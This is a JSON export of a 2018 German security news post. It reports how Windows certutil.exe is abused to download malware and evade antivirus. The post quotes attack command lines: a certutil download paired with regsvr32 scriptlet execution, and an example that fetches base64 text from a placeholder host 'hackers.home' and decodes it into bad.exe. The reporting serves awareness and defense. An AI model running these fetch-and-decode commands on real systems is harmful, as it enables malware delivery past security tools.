{"id":203014,"date":"2018-04-05T08:06:35","date_gmt":"2018-04-05T06:06:35","guid":{"rendered":"https:\/\/www.borncity.com\/blog\/?p=203014"},"modified":"2024-03-14T16:28:56","modified_gmt":"2024-03-14T15:28:56","slug":"windows-certutil-exe-ermglicht-malware-einzuschleusen","status":"publish","type":"post","link":"https:\/\/borncity.com\/blog\/2018\/04\/05\/windows-certutil-exe-ermglicht-malware-einzuschleusen\/","title":{"rendered":"Windows CertUtil.exe erm&ouml;glicht Malware einzuschleusen"},"content":{"rendered":"<p><img loading=\"lazy\" decoding=\"async\" style=\"float: left; margin: 0px 10px 0px 0px; display: inline\" src=\"https:\/\/borncity.com\/blog\/wp-content\/uploads\/2015\/01\/Schutz.jpg\" width=\"40\" align=\"left\" height=\"47\"\/>Mit Windows wird das Tool <em>CertUtil.exe<\/em> zur Verwaltung von Zertifikaten mitgeliefert. Dieses Tool l\u00e4sst sich u. U. missbrauchen, um Malware an den Antivirus-Systemen vorbei auf ein System zu schleusen. <\/p>\n<p><!--more--><\/p>\n<p>Mit <em>CertUtil.exe<\/em> k\u00f6nnen Sie verschiedene Funktionen im Zusammenhang mit Zertifikaten und Zertifikatsspeichern ausf\u00fchren. Zum Beispiel ist es in Windows m\u00f6glich, Zertifikate zu installieren, zu sichern, zu l\u00f6schen, zu verwalten und auszuf\u00fchren.<\/p>\n<h2>Download per CertUtil<\/h2>\n<p>Eine der Funktionen von CertUtil bietet die M\u00f6glichkeit, ein Zertifikat oder eine andere Datei von einer entfernten URL herunterzuladen und als lokale Datei mit der Syntax <\/p>\n<p><em>certutil.exe -urlcache -split -f [URL] output.file<\/em><\/p>\n<p>zu speichern. Bereits 2017 meldete der Sicherheitsforscher Casey Smith seine Bedenken, dass diese Methode zum Herunterladen von Malware verwendet werden k\u00f6nnte, an.<\/p>\n<blockquote class=\"twitter-tweet\" data-lang=\"de\">\n<p lang=\"en\" dir=\"ltr\">certutil -urlcache -split -f [serverURL] file.blah<br \/>regsvr32.exe \/s \/u \/I:file.blah scrub.dll<br \/>Makes a nice pairing.<\/p>\n<p>\u2014 Casey Smith (@subTee) 20. Juli 2017<\/p><\/blockquote>\n<p><script async src=\"https:\/\/platform.twitter.com\/widgets.js\" charset=\"utf-8\"><\/script> <\/p>\n<p>Diese Bedenken waren berechtigt, inzwischen verwenden Angreifer <em>CertUtil<\/em>, um Malware herunterzuladen, wie <a href=\"https:\/\/www.hybrid-analysis.com\/sample\/87cf118bff58c38bc0d54c1d3fcc553e381df838437a99a2006dd8f726406c16?environmentId=100\" target=\"_blank\" rel=\"noopener\">dieses Beispiel<\/a> aus dem Jahr 2016 und ein neuer Trojaner vom M\u00e4rz 2018 zeigen. verwendet es auch, um verschiedene Batch-Dateien und Skripte auf einen infizierten Computer herunterzuladen.<\/p>\n<p><a href=\"https:\/\/i.imgur.com\/B9as27o.jpg\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" title=\"Trojaner-Code\" alt=\"Trojaner-Code\" src=\"https:\/\/i.imgur.com\/B9as27o.jpg\" width=\"623\" height=\"171\"\/><\/a><br \/>(Trojaner-Code, zum Vergr\u00f6\u00dfern klicken)<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" alt=\"\" src=\"https:\/\/ssl-vg03.met.vgwort.de\/na\/e343c07f6a9c40acbe39b1adf0c804e9\" width=\"1\" height=\"1\"\/>Manche Computer sind zwar so konfiguriert, dass unbekannte Anwendungen nicht ausgef\u00fchrt werden k\u00f6nnen. \u00dcber den Ansatz Batch- oder Script-Programme und <em>CertUtil.exe<\/em> l\u00e4sst sich diese Sperre zum Download von Programmen aber oft umgehen. <\/p>\n<h2>Antivirus-L\u00f6sungen ausgetrickst<\/h2>\n<p>Der Sicherheitskonsultant <a href=\"https:\/\/twitter.com\/xme\" target=\"_blank\" rel=\"noopener\">Xavier Mertens<\/a> ver\u00f6ffentlichte einen Ansatz, der es Malware unter Verwendung von CertUtil einfacher macht, unentdeckt zu bleiben. Wie Bleeping Computer <a href=\"https:\/\/www.bleepingcomputer.com\/news\/security\/certutilexe-could-allow-attackers-to-download-malware-while-bypassing-av\/\" target=\"_blank\" rel=\"noopener\">hier schreibt<\/a>, wird die Datei mit der Malware zun\u00e4chst als harmloser Text kodiert und nach dem Download mit <em>CertUtil.exe<\/em> \u00fcber folgenden Befehl dekodiert.<\/p>\n<p><code>certutil.exe -urlcache -split -f [URL] output.file<\/code><\/p>\n<p>In dieser Form k\u00f6nnte eine Antivirus-Software die Malware noch erkennen. Dies l\u00e4sst sich umgehen, indem die b\u00f6sartige Datei zun\u00e4chst mit base64 kodieren wird. Dann erscheint sie f\u00fcr den AV-Scanner als harmloser Text. Die heruntergeladene und Base64-kodierte Textdatei l\u00e4sst sich mit dem Befehl <em>certutil.exe \u2013decode <\/em>in eine ausf\u00fchrbare Datei in dekodieren. Xavier Mertens hat folgendes Beispiel ver\u00f6ffentlicht:<\/p>\n<p>C:\\Temp&gt;certutil.exe -urlcache -split -f \"https: \/\/ hackers.home\/badcontent.txt\" bad.txt<br \/>C:\\Temp&gt;certutil.exe -decode bad.txt bad.exe<\/p>\n<p>Das Team von <a href=\"https:\/\/twitter.com\/malwrhunterteam\" target=\"_blank\" rel=\"noopener\">MalwareHunter<\/a> teilte Bleeping Computer mit, dass dieser Ansatz bereits genutzt werde. <\/p>\n<blockquote class=\"twitter-tweet\" data-lang=\"de\">\n<p lang=\"en\" dir=\"ltr\">Brazilian coders are already abusing this tool for some time, using to install more malware&#8230;<\/p>\n<p>\u2014 Fabio Assolini (@assolini) <a href=\"https:\/\/twitter.com\/assolini\/status\/981608599100289024?ref_src=twsrc%5Etfw\">4. April 2018<\/a><\/p><\/blockquote>\n<p><script async src=\"https:\/\/platform.twitter.com\/widgets.js\" charset=\"utf-8\"><\/script>  <\/p>\n<p>Auch Kaspersky-Sicherheitsforscher Fabio Assolini weist in obigem Tweet darauf hin, dass diese Methode bereits seit einiger Zeit von brasilianischen Programmierern verwendet wird.<\/p>\n<p><strong>\u00c4hnliche Artikel:<\/strong><br \/><a href=\"https:\/\/borncity.com\/blog\/2018\/04\/04\/ausgepatcht-keine-update-fr-ltere-intel-cpus\/\">Ausgepatcht: Keine Microcode-Updates f\u00fcr \u00e4ltere Intel-CPUs<\/a><br \/><a href=\"https:\/\/borncity.com\/blog\/2018\/04\/04\/kritisches-update-fr-ms-malware-protection-engine\/\">Kritisches Update f\u00fcr MS Malware Protection Engine (CVE-2018-0986)<\/a><br \/><a href=\"https:\/\/borncity.com\/blog\/2017\/02\/10\/erebus-ransomware-und-die-ausgetrickste-uac\/\">Erebus Ransomware und die ausgetrickste UAC<\/a><br \/><a href=\"https:\/\/borncity.com\/blog\/2017\/05\/24\/windows10-neue-uac-bypassing-methode-fodhelper-exe\/\">Windows10: Neue UAC-Bypassing-Methode (fodhelper.exe)<\/a><br \/><a href=\"https:\/\/borncity.com\/blog\/2017\/08\/07\/windows-sicherheitslcke-ber-lnk-codeausfhrung\/\">Windows: Sicherheitsl\u00fccke \u00fcber LNK-Codeausf\u00fchrung<\/a><br \/><a href=\"https:\/\/borncity.com\/blog\/2017\/04\/26\/oem-bloatware-pdiservice-exe-als-sicherheitsrisiko-auf-notebooks\/\">OEM-Bloatware (PdiService.exe) als Sicherheitsrisiko auf Notebooks<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Mit Windows wird das Tool CertUtil.exe zur Verwaltung von Zertifikaten mitgeliefert. Dieses Tool l\u00e4sst sich u. U. missbrauchen, um Malware an den Antivirus-Systemen vorbei auf ein System zu schleusen.<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[426,301],"tags":[4328,4325],"class_list":["post-203014","post","type-post","status-publish","format-standard","hentry","category-sicherheit","category-windows","tag-sicherheit","tag-windows"],"_links":{"self":[{"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/posts\/203014","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/comments?post=203014"}],"version-history":[{"count":0,"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/posts\/203014\/revisions"}],"wp:attachment":[{"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/media?parent=203014"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/categories?post=203014"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/tags?post=203014"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}